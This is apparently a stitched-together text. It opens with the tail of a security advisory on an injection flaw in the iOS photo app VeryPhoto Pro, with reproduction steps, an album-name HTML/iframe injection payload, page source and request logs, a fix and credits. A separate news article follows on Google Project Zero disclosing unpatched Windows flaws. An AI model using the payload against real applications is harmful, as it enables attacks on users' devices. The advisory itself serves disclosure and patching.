(https://itunes.apple.com/de/app/veryphoto-pro-album-password/id720810114) 2. Open in the device menu the default photo album app of apple (iphone/ipad) 3. Add a new album and change the name to local command that should be injected 4. Save the settings and open the VeryPhoto Pro Album application 5. Start the Wifi service 6. Surf with a local network device to the local web-server (localhost:8080) Note: The execution of the command inject occurs after the wifi interface index has been visited. The vulnerable value that executes the command is the albumname. 7. Successful reproduce of the local command inject web vulnerability! PoC: Albumname - File Dir Index </script><tr><td height="170" width="150"><p align="center"> <img src="getCoverImage?%7B%22name%22:%22%5C%22%3E%3C[LOCAL COMMAND INJECTION VULNERABILITY!]img%20src=%5C%22x%5C%22%3E%2520%3Ciframe%20src=a%3E%3E%22,%22type%22:%222%22,%22groupType%22:2,%22url%22:%22 assets-library://group/?id=7BADE58E-C286-43D8-8CE2-4415C4DF35CA&filter=1537%22,%22numberOfImage%22:%220%22%7D" onclick="albumClick('0')" border="0" height="150" width="170"></p></td><td height="170" width="50"></td><td height="170" width="150"><p align="center"> <img src="getCoverImage?%7B%22name%22:%22Camera%20Roll%22,%22type%22:%222%22,%22groupType%22:16,%22url%22:%22assets-library://group/?id=70169F06-36C7-430C-AA4F-55B95E268426%22, %22numberOfImage%22:%223%22%7D" onclick="albumClick('1')" border="0" height="150" width="170"></p></td><td height="170" width="50"></td><td height="170" width="150"> <p align="center"><img src="getCoverImage?%7B%22name%22:%22My%20Photo%20Stream%22,%22type%22:%222%22,%22groupType%22:32,%22url%22:%22 assets-library://group/?id=F8476D51-E4C9-4A2A-948B-2D577719B9C7&filter=1537%22,%22numberOfImage%22:%220%22%7D" onclick="albumClick('2')" border="0" height="150" width="170"></p></td><td height="170" width="50"></td><td height="170" width="150"></td></tr><tr><td height="20"> <p align="center"><font size="2" face="Courier New">"><img src="x">%20<iframe src="a">>(0)</font></td><td height="20" width="50"></td> <td height="20" > <p align="center"><font face="Courier New" size="2">Camera Roll(3)</font></td><td height="20" width="50"></td><td height="20" > <p align="center"><font face="Courier New" size="2">My Photo Stream(0)</font></td><td height="20" width="50"></td><td height="20" > <p align="center"></td></tr><tr><td height="20" colspan="7"></td></tr> </table> </div> --- PoC Session Logs [GET] (Execution) --- Status: 200[OK] GET http://192.168.2.104:8080/getCoverImage?%7B%22name%22:%22%5C%22%3E%3Cimg%20src=%5C%22x%5C%22%3E%2520%3Ciframe%20src=a%3E%3E%22,%22type%22:%222%22,%22groupType%22:2,%22url%22:%22assets-library://group/?id=7BADE58E-C286-43D8-8CE2-4415C4DF35CA&filter=1537%22,%22numberOfImage%22:%220%22%7D Load Flags[VALIDATE_ALWAYS ] Größe des Inhalts[3813] Mime Type[image/x-jpg] Request Header: Host[192.168.2.104:8080] User-Agent[Mozilla/5.0 (Windows NT 6.3; WOW64; rv:34.0) Gecko/20100101 Firefox/34.0] Accept[image/png,image/*;q=0.8,*/*;q=0.5] Accept-Language[de,en-US;q=0.7,en;q=0.3] Accept-Encoding[gzip, deflate] Referer[http://192.168.2.104:8080/] Connection[keep-alive] Cache-Control[max-age=0] Response Header: Accept-Charset[utf-8] Content-Length[3813] Content-Type[image/x-jpg] Connection[close] - Response Status: OK[200] GET http://192.168.2.104:8080/x[LOCAL COMMAND INJECTION VULNERABILITY!] Load Flags[VALIDATE_ALWAYS ] Größe des Inhalts[unknown] Mime Type[unknown] Request Header: Host[192.168.2.104:8080] User-Agent[Mozilla/5.0 (Windows NT 6.3; WOW64; rv:34.0) Gecko/20100101 Firefox/34.0] Accept[image/png,image/*;q=0.8,*/*;q=0.5] Accept-Language[de,en-US;q=0.7,en;q=0.3] Accept-Encoding[gzip, deflate] Referer[http://192.168.2.104:8080/] Reference(s): http://localhost:8080/x http://localhost:8080/getCoverImage Solution - Fix & Patch: ======================= The vulnerability can be patched by a secure encode and parse of the vulnerable `albumname` value. Restrict the albumname value and disallow special charsi to prevent application-side injection attacks. Encode in the file dir index listing the vulnerable output value to prevent the execution of local commands. Security Risk: ============== The security risk of the local command inject web vulnerability in the albumname is estimated as medium. (CVSS 5.6) Credits & Authors: ================== Vulnerability Laboratory [Research Team] - Benjamin Kunz Mejri (bkm@evolution-sec.com) [www.vulnerability-lab.com] Source

Microsoft has heavily criticized Google and its 90-days security disclosure policy after the firm publicly revealed two zero-day vulnerabilities in Microsoft’s Windows 8.1 operating system one after one just days before Microsoft planned to issue a patch to kill the bugs. But, seemingly Google don't give a damn thought. Once again, Google has publicly disclosed a new serious vulnerability in Windows 7 and Windows 8.1 before Microsoft has been able to produce a patch, leaving users of both the operating systems exposed to hackers until next month, when the company plans to deliver a fix. DISCLOSURE OF UNPATCHED BUGS, GOOD OR BAD? Google’s tight 90-days disclosure policy seems to be a good move for all software vendors to patch their products before they get exploited by the hackers and cybercriminals. But at the same time, disclosing all critical bugs along with its technical details in the widely used operating system like Windows 7 and 8 doesn’t appears to be a right decision either. In both cases, the only one to suffer is the innocent users. The revelation of the security flaw was also a part Google's Project Zero, an initiative that identifies security holes in different software and calls on companies to publicly disclose and patch bugs within 90 days of discovering them. This time the search engine giant has discovered a flaw in the CryptProtectMemory memory-encrypting function found within Windows 7 and 8.1 and presents in both 32- and 64-bit architectures, which can accidentally disclose sensitive information or allow a miscreant to bypass security checks, apparently. MICROSOFT WILL DELIVER PATCH IN FEB, 2015 Google first notified Microsoft of the vulnerability in Windows 7 and 8.1 on October 17, 2014. Microsoft then confirmed the security issues on October 29 and said that its developers managed to reproduce the security hole. The patch for the vulnerability is scheduled for Feb. 10, next Patch Tuesday. The vulnerability was found by James Forshaw, who also discovered a "privilege elevation flaw" in Windows 8.1, which was disclosed earlier this week and drew strong criticism from Microsoft. The newly discovered bug actually resides in the CNG.sys implementation, which failed to run proper token checks. This is third time in less than a month when the Google’s Project Zero released details of the vulnerability in Microsoft’s operating system, following its 90-day public disclosure deadline policy. Few days ago, Google released details of a new privilege escalation bug in Microsoft's Windows 8.1 operating system just two days before Microsoft planned to patch the bug. Google vs. Microsoft — Google reveals Third unpatched Zero-Day Vulnerability in Windows - Hacker News